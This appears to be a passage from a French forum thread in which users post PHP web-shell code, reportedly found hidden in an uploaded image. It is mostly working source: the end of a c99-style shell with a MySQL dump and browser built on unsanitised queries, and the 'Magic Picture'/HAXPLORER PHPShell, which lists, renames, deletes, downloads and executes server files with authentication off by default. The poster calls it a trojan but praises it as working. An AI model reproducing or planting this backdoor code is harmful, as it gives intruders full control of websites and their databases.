     $set["sock"] = $sql_sock;
     $set["db"] = $sql_db;
     $dump_out = "download";
     $set["print"] = 0;
     $set["nl2br"] = 0;
     $set[""] = 0;
     $set["file"] = $dump_file;
     $set["add_drop"] = TRUE;
     $set["onlytabs"] = array();
     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
     $ret = mysql_dump($set);
     if ($sql_dump_download)
     {
      @ob_clean();
      header("Content-type: application/octet-stream" );
      header("Content-length: ".strlen($ret));
      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";" );
      echo $ret;
      exit;
     }
     elseif ($sql_dump_savetofile)
     {
      $fp = fopen($sql_dump_file,"w" );
      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
      else
      {
       fwrite($fp,$ret);
       fclose($fp);
       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file))." )</b>.";
      }
     }
     else {echo "<b>Dump: nothing to do!</b>";}
    }
   }
   if ($diplay)
   {
    if (!empty($sql_tbl))
    {
     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;" );
     $count_row = mysql_fetch_array($count);
     mysql_free_result($count);
     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;" );
     $tbl_struct_fields = array();
     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
     $perpage = $sql_tbl_le - $sql_tbl_ls;
     if (!is_numeric($perpage)) {$perpage = 10;}
     $numpages = $count_row[0]/$perpage;
     $e = explode(" ",$sql_order);
     if (count($e) == 2)
     {
      if ($e[0] == "d" ) {$asc_desc = "DESC";}
      else {$asc_desc = "ASC";}
      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
     }
     else {$v = "";}
     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
     $result = mysql_query($query) or print(mysql_smarterror());
     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     if ($sql_tbl_act == "structure" ) {echo "<br><br><b>Coming sooon!</b>";}
     if ($sql_tbl_act == "insert" )
     {
      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
      if (!empty($sql_tbl_insert_radio))
      {

 

     }
      else
      {
       echo "<br><br><b>Inserting row into table:</b><br>";
       if (!empty($sql_tbl_insert_q))
       {
        $sql_query = "SELECT * FROM `".$sql_tbl."`";
        $sql_query .= " WHERE".$sql_tbl_insert_q;
        $sql_query .= " LIMIT 1;";
        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
        $values = mysql_fetch_assoc($result);
        mysql_free_result($result);
       }
       else {$values = array();}
       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
       foreach ($tbl_struct_fields as $field)
       {
        $name = $field["Field"];
        if (empty($sql_tbl_insert_q)) {$v = "";}
        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
        $i++;
       }
       echo "</table><br>";
       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
      }
     }
     if ($sql_tbl_act == "browse" )
     {
      $sql_tbl_ls = abs($sql_tbl_ls);
      $sql_tbl_le = abs($sql_tbl_le);
      echo "<hr size=\"1\" noshade>";
      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
      $b = 0;
      for($i=0;$i<$numpages;$i++)
      {
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
       echo $i;
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
       else {echo "&nbsp;";}
      }
      if ($i == 0) {echo "empty";}
      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
      echo "<tr>";
      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
      for ($i=0;$i<mysql_num_fields($result);$i++)
      {
       $v = mysql_field_name($result,$i);
       if ($e[0] == "a" ) {$s = "d"; $m = "asc";}
       else {$s = "a"; $m = "desc";}
       echo "<td>";
       if (empty($e[0])) {$e[0] = "a";}
       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
       echo "</td>";
      }
      echo "<td><font color=\"green\"><b>Action</b></font></td>";
      echo "</tr>";
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       echo "<tr>";
       $w = "";
       $i = 0;
       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
       $i = 0;
       foreach ($row as $k=>$v)
       {
        $v = htmlspecialchars($v);
        if ($v == "" ) {$v = "<font color=\"green\">NULL


Message édité par le_phoenix le 16-11-2007 à 20:02:04
Reply

Marsh Posté le 16-11-2007 à 17:02:43    

Voici le code que j'ai trouvé dans l'image uploadée:

 

outil aussi considéré comme un troyen,
qui permet de lister , modifier et supprimer n'importe quel fichier de votre site.
très utile pour administrer rapidement son site, mais il est beaucoup plus simplifié que le 1er!

 

Admirez un code qui marche du premier coup les amis!
(PS: surtout ne le mettez pas sur votre site sans le protéger par un mot de passe!)

 


Code :
  1. <html>
  2. <head>
  3. <title>Magic Picture devellopped by securfrog</title>
  4. </head>
  5. </body>
  6. <center>
  7. <table width=75% border=1>
  8. <tr>
  9. <td bgcolor=gray>
  10. <center><u><b>Magic Picture devellopped by securfrog</font></b></u></center>
  11. <?php
  12. /*Setting some envirionment variables...*/
  13. /* I added this to ensure the script will run correctly...
  14.    Please enter the Script's filename in this variable. */ 
  15. $SFileName=$PHP_SELF;
  16. /* uncomment the two following variables if you want to use http
  17.    authentication. This will password protect your PHPShell */
  18. //$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
  19. //$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */    
  20. error_reporting(0);
  21. $PHPVer=phpversion();
  22. $isGoodver=(intval($PHPVer[0])>=4);
  23. $scriptTitle = "MagicPicture";
  24. $scriptident = "$scriptTitle devellopped by securfrog";
  25. $urlAdd = "";
  26. $formAdd = "";
  27. function walkArray($array){
  28.   while (list($key, $data) = each($array))
  29.     if (is_array($data)) { walkArray($data); }
  30.     else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
  31. }
  32. if (isset($_PUT)) walkArray($_PUT);
  33. if (isset($_GET)) walkArray($_GET);
  34. if (isset($_POST)) walkArray($_POST);
  35. $pos = strpos($urlAdd, "s=r" );
  36. if (strval($pos) != "" ) {
  37. $urlAdd= substr($urlAdd, 0, $pos);
  38. }
  39. $urlAdd .= "&s=r&";
  40. if (empty($Pmax))
  41. $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
  42. if (empty($Pidx))
  43. $Pidx = 0;
  44. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  45. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  46. $scriptdate = "10/02/2006";
  47. $scriptver = "Version 2.6.6dev the PHPShell is made by the maker ";
  48. $LOCAL_IMAGE_DIR = "img";
  49. $REMOTE_IMAGE_URL = "img";
  50. $img = array(
  51.    "Edit"   => "edit.gif",
  52.    "Download"  => "download.gif",
  53.    "Upload"  => "upload.gif",
  54.    "Delete"  => "delete.gif",
  55.    "View"   => "view.gif",
  56.    "Rename"  => "rename.gif",
  57.    "Move"   => "move.gif",
  58.    "Copy"   => "copy.gif",
  59.    "Execute"  => "exec.gif"
  60.             );
  61. while (list($id, $im)=each($img))
  62. if (file_exists("$LOCAL_IMAGE_DIR/$im" ))
  63.  $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
  64. else
  65.   $img[$id] = "[$id]";
  66. /* HTTP AUTHENTICATION */
  67.     if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes" )  )   {
  68.     setcookie("noauth","" );
  69.     Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"" );
  70.     Header( "HTTP/1.0  401  Unauthorized" );
  71.     echo "Your username or password is incorrect";
  72.     exit ;
  73.      
  74.     }
  75. function buildUrl($display, $url) {
  76.         global $urlAdd;
  77.         $url = $SFileName . "?$urlAdd$url";
  78. return "<a href=\"$url\">$display</a>";
  79. }
  80. function sp($mp) {
  81. for ( $i = 0; $i < $mp; $i++ )
  82.  $ret .= "&nbsp;";
  83. return $ret;
  84. }
  85. function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  }
  86. function Mydeldir($Fdir) {
  87. if (is_dir($Fdir)) {
  88.  $Fh=@opendir($Fdir);
  89.   while ($Fbuf = readdir($Fh))
  90.    if (($Fbuf != "." ) && ($Fbuf != ".." ))
  91.    Mydeldir("$Fdir/$Fbuf" );
  92.  @closedir($Fh);
  93.    return rmdir($Fdir);
  94. } else {
  95.  return unlink($Fdir);
  96. }
  97. }
  98. function arrval ($array) {
  99. list($key, $data) = $array;
  100. return $data;
  101. }
  102. function formatsize($insize) { 
  103. $size = $insize;
  104. $add = "B";
  105. if ($size > 1024) {
  106.   $size = intval(intval($size) / 1.024)/1000;
  107.   $add = "KB";
  108.  }
  109.  if ($size > 1024) {
  110.   $size = intval(intval($size) / 1.024)/1000;
  111.   $add = "MB";
  112.  }
  113.  if ($size > 1024) {
  114.   $size = intval(intval($size) / 1.024)/1000;
  115.   $add = "GB";
  116.  }
  117.  if ($size > 1024) {
  118.   $size = intval(intval($size) / 1.024)/1000;
  119.   $add = "TB";
  120.  }
  121.  return "$size $add";
  122. }
  123. if ($cmd != "downl" ) {
  124. ?>
  125. <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
  126. <HTML>
  127. <HEAD>
  128.   <STYLE>
  129.   <!--
  130.     A{ text-decoration:none; color:navy; font-size: 12px }
  131.     body { font-size: 12px;
  132.            font-family: arial, helvetica;
  133.             scrollbar-width: 5;
  134.             scrollbar-height: 5;
  135.             scrollbar-face-color: white;
  136.             scrollbar-shadow-color: silver;
  137.             scrollbar-highlight-color: white;
  138.             scrollbar-3dlight-color:silver;
  139.             scrollbar-darkshadow-color: silver;
  140.             scrollbar-track-color: white;
  141.             scrollbar-arrow-color: black;
  142.     }
  143.     Table { font-size: 12px; }
  144.     TR{ font-size: 12px; }
  145.     TD{ font-size: 12px;
  146.         font-family: arial, helvetical;
  147.         BORDER-LEFT: black 0px solid;
  148. BORDER-RIGHT: black 0px solid;
  149. BORDER-TOP: black 0px solid;
  150. BORDER-BOTTOM: black 0px solid;
  151. COLOR: black;
  152.     }
  153.     .border{       BORDER-LEFT: black 1px solid;
  154.      BORDER-RIGHT: black 1px solid;
  155.      BORDER-TOP: black 1px solid;
  156.      BORDER-BOTTOM: black 1px solid;
  157.    }
  158.     .none  {       BORDER-LEFT: black 0px solid;
  159.      BORDER-RIGHT: black 0px solid;
  160.      BORDER-TOP: black 0px solid;
  161.      BORDER-BOTTOM: black 0px solid;
  162.    }
  163.     .inputtext {
  164.      background-color: #EFEFEF;
  165.      font-family: arial, helvetica;
  166.      border: 1px solid #000000;
  167.      height: 20;
  168.     }
  169.     .lighttd {       background: #F8F8F8;
  170.     }
  171.     .darktd {        background: #E8E8E8;
  172.     }
  173.     input { font-family: arial, helvetica;
  174.     }
  175.     .inputbutton {
  176.                         background-color: silver;
  177.   border: 1px solid #000000;
  178.   border-width: 1px;
  179.   height: 20;
  180.     }
  181.     .inputtextarea {
  182.      background-color: #EFEFEF;
  183.      border: 1px solid #000000;
  184.      scrollbar-width: 5;
  185.      scrollbar-height: 5;
  186.      scrollbar-face-color: #EFEFEF;
  187.      scrollbar-shadow-color: silver;
  188.      scrollbar-highlight-color: #EFEFEF;
  189.      scrollbar-3dlight-color:silver;
  190.      scrollbar-darkshadow-color: silver;
  191.      scrollbar-track-color: #EFEFEF;
  192.      scrollbar-arrow-color: black;
  193.     }
  194.     .top { BORDER-TOP: black 1px solid; }
  195.     .textin { BORDER-LEFT: silver 1px solid;
  196.               BORDER-RIGHT: silver 1px solid;
  197.        BORDER-TOP: silver 1px solid;
  198.               BORDER-BOTTOM: silver 1px solid;
  199.               width: 99%; font-size: 12px; font-weight: bold; color: navy;
  200.             }
  201.     .notop { BORDER-TOP: black 0px solid; }
  202.     .bottom { BORDER-BOTTOM: black 1px solid; }
  203.     .nobottom { BORDER-BOTTOM: black 0px solid; }
  204.     .left { BORDER-LEFT: black 1px solid; }
  205.     .noleft { BORDER-LEFT: black 0px solid; }
  206.     .right { BORDER-RIGHT: black 1px solid; }
  207.     .noright { BORDER-RIGHT: black 0px solid; }
  208.     .silver{ BACKGROUND: silver; }
  209.   -->
  210.   </STYLE>
  211.   <TITLE><?php echo $SFileName ?></TITLE>
  212. </HEAD>
  213. <body topmargin="0" leftmargin="0">
  214. <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
  215. <table width=100% height="100%" NOWRAP border="0">
  216.   <tr NOWRAP>
  217.    <td width="100%" NOWRAP>
  218.     <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
  219.      <tr>
  220.       <td width="100%" class="silver border">
  221.        <center>
  222.     <strong>
  223.   <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
  224.             </strong>
  225.        </center>
  226.       </td>
  227.      </tr>
  228.     </table><br>
  229. <?php
  230. }
  231. if ( $cmd=="dir" ) {
  232.    $h=@opendir($dir);
  233.  if ($h == false) {
  234.     echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
  235.                 COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
  236.                 THE SCRIPT WILL RESULT IN AN ERROR!!!
  237.                 <br><br>".sp(3)."\n
  238.                 PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
  239.                 <br><br></font>\n\n\n\n";
  240.  }
  241.         if (function_exists('realpath')) {
  242.  $partdir = realpath($dir);
  243. }
  244.         else {
  245.  $partdir = $dir;
  246. }
  247.  if (strlen($partdir) >= 100) {
  248.   $partdir = substr($partdir, -100);
  249.   $pos = strpos($partdir, "/" );
  250.   if (strval($pos) != "" ) {
  251.    $partdir = "<--   ...".substr($partdir, $pos);
  252.   }
  253.         $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
  254.         $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  255. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  256.  }
  257.     ?>
  258.       <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
  259.          <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
  260.   <tr>
  261.    <td width="100%" class="silver border">
  262.     <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
  263.    </td>
  264.   </tr>
  265.  </table>
  266.        <br>
  267.  <table width="100%" border="0" cellpadding="0" cellspacing="0">
  268.   <tr>
  269.            <td class="border nobottom noright">
  270.             &nbsp;Browsing:&nbsp;
  271.   </td>
  272.           <td width="100%" class="border nobottom noleft">
  273.         <table width="100%" border="0" cellpadding="1" cellspacing="0">
  274.              <tr>
  275.               <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
  276.               <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
  277.              </tr>
  278.             </table>
  279.            
  280.   </td>
  281.  </tr>
  282. </table>
  283.   <!--    </form>   -->
  284.         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
  285.          <tr>
  286.   <td width="100%" NOWRAP class="silver border">
  287.    &nbsp;Filename&nbsp;
  288.   </td>
  289.           <td NOWRAP class="silver border noleft">
  290.    &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
  291.   </td>
  292.           <td NOWRAP class="silver border noleft">
  293.    &nbsp;Size&nbsp;
  294.   </td>
  295.           <td width=1 NOWRAP class="silver border noleft">
  296.    &nbsp;Attributes&nbsp;
  297.   </td>
  298.           <td NOWRAP class="silver border noleft">
  299.    &nbsp;Modification Date&nbsp;
  300.   </td>
  301.  <tr>
  302.     <?php
  303.        /* <!-- This whole heap of junk is the sorting section... */
  304.  $dirn  = array();
  305.  $filen  = array();
  306.  $filesizes = 0;
  307.  while ($buf = readdir($h)) {
  308.     if (is_dir("$dir/$buf" ))
  309.   $dirn[] = $buf;
  310.       else
  311.    $filen[] = $buf;
  312.      }
  313.  $dirno  = count($dirn) + 1;
  314.   $fileno = count($filen) + 1;
  315.     function mycmp($a, $b){
  316.   if ($a == $b) return 0;
  317.   return (strtolower($a) < strtolower($b)) ? -1 : 1;
  318.  }
  319.  if (function_exists("usort" )) {
  320.   usort($dirn, "mycmp" );
  321.   usort($filen, "mycmp" );
  322.  }
  323.  else {
  324.   sort ($dirn);
  325.    sort ($filen);
  326.   }
  327. reset ($dirn);
  328.  reset ($filen);
  329.  if (function_exists('array_merge')) {
  330.  $filelist = array_merge ($dirn, $filen);
  331. }
  332.  else {
  333.  $filelist = $dirn + $filen;
  334. }
  335. if ( count($filelist)-1 > $Pmax ) {
  336.  $from = $Pidx * $Pmax;
  337.  $to = ($Pidx + 1) * $Pmax-1;
  338.  if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
  339.   $to = count($filelist) - 1;
  340.  if ($to > count($filelist)-1)
  341.   $to = count($filelist)-1;
  342.  $Dcontents = array();
  343.  For ($Fi = $from; $Fi <= $to; $Fi++) {
  344.   $Dcontents[] = $filelist[$Fi];
  345.  }
  346. }
  347. else {
  348.  $Dcontents = $filelist;
  349. }
  350.      $tdcolors = array("lighttd", "darktd" );
  351.      while (list ($key, $file) = each ($Dcontents)) {
  352.           if (!$tdcolor=arrval(each($tdcolors))) {
  353.     reset($tdcolors);
  354.     $tdcolor = arrval(each($tdcolors));   }
  355.           
  356.   if (is_dir("$dir/$file" )) { /* <!-- If it's a Directory --> */
  357.              /* <!-- Dirname --> */
  358.   echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file" ) .sp(9)."</td>\n";
  359.       /* <!-- Actions --> */
  360.   echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
  361.     /* <!-- Rename --> */
  362.   if ( ($file != "." ) && ($file != ".." ) )
  363.    echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file" ).sp(3)."\n";
  364.     /* <!-- Delete --> */
  365.   if ( ($file != "." ) && ($file != ".." ) )
  366.    echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir" )."\n";
  367.    /* <!-- End of Actions --> */
  368.   echo "&nbsp;&nbsp;</center></td>\n";
  369.       /* <!-- Size --> */
  370.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
  371.     /* <!-- Attributes --> */
  372.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  373.    echo "<strong>D</strong>";
  374.          if ( @is_readable("$dir/$file" ) ) {
  375.        echo "<strong>R</strong>";
  376.    }
  377.    if (function_exists('is_writeable')) {
  378.    if ( @is_writeable("$dir/$file" ) ) {
  379.      echo "<strong>W</stong>";
  380.     }
  381.   }
  382.    else {
  383.         echo "<strong>(W)</stong>";
  384.      }
  385.      if ( @is_executable("$dir/$file" ) ) {
  386.     echo "<Strong>X<strong>";
  387.    }
  388.    echo "&nbsp;&nbsp;</td>\n";
  389.     /* <!-- Date --> */
  390.   echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  391.    echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file" ))."&nbsp;&nbsp;";
  392.    echo "</td>";
  393.   echo "</tr>\n";
  394.          }
  395.     else { /* <!-- Then it must be a File... --> */
  396.          /* <!-- Filename --> */
  397.   if ( @is_readable("$dir/$file" ) )
  398.     echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file" ).sp(9)."</td>\n";
  399.      else
  400.       echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
  401.             /* <!-- Actions --> */
  402.   echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
  403.     /* <!-- Rename --> */
  404.   echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file" ).sp(3)."\n";
  405.       /* <!-- Edit --> */
  406.   if ( (@is_writeable("$dir/$file" )) && (@is_readable("$dir/$file" )) )
  407.     echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file" ).sp(3)."\n";
  408.        /* <!-- Copy --> */
  409.    echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file" )."\n";
  410.       /* <!-- Move --> */
  411.   if ( (@is_writeable("$dir/$file" )) && (@is_readable("$dir/$file" )) )
  412.      echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file" )."\n";
  413.         /* <!-- Delete --> */
  414.   echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir" )."\n";
  415.     /* <!-- Download --> */
  416.   echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file" )."\n";
  417.     /* <!-- Execute --> */
  418.   if ( @is_executable("$dir/$file" ) )
  419.     echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file" )."\n";
  420.         /* <!-- End of Actions --> */
  421.   echo sp(2)."</center></td>\n";
  422.     /* <!-- Size --> */
  423.   echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
  424.    $size = @filesize("$dir/$file" );
  425.    If ($size != false) {
  426.           $filesizes += $size;
  427.    echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
  428.   }
  429.   else
  430.    echo "&nbsp;&nbsp;<strong>0 B<strong>";
  431.    echo "&nbsp;&nbsp;</td>\n";
  432.     /* <!-- Attributes --> */
  433.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  434.    if ( @is_readable("$dir/$file" ) )
  435.     echo "<strong>R</strong>";
  436.       if ( @is_writeable("$dir/$file" ) )
  437.     echo "<strong>W</stong>";
  438.       if ( @is_executable("$dir/$file" ) )
  439.     echo "<Strong>X<strong>";
  440.       if (function_exists('is_uploaded_file')){
  441.     if ( @is_uploaded_file("$dir/$file" ) )
  442.      echo "<Strong>U<strong>";
  443.    }
  444.    else {
  445.    echo "<Strong>(U)<strong>";
  446.   }
  447.    echo "&nbsp;&nbsp;</td>\n";
  448.     /* <!-- Date --> */
  449.   echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
  450.    echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file" ))."&nbsp;&nbsp;";
  451.    echo "</td>";
  452.    echo "</tr>\n";
  453.   }
  454.    }
  455.      echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
  456.    echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n";
  457.    echo "</td><td NOWRAP class=\"silver border noleft\">\n";
  458.    echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
  459. function printpagelink($a, $b, $link = "" ){
  460.  if ($link != "" )
  461.   echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
  462.  else
  463.   echo "<b>| $a - $b |</b>";
  464. }
  465.        
  466. if ( count($filelist)-1 > $Pmax ) {
  467.  echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
  468.  $Fi = 0;
  469.  while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
  470.   $from = $Fi*$Pmax;
  471.   while (($filelist[$from]=="." ) || ($filelist[$from]==".." )) $from++;
  472.   $to = ($Fi + 1) * $Pmax - 1;
  473.   if ($Fi == $Pidx)
  474.    $link="";
  475.   else
  476.    $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
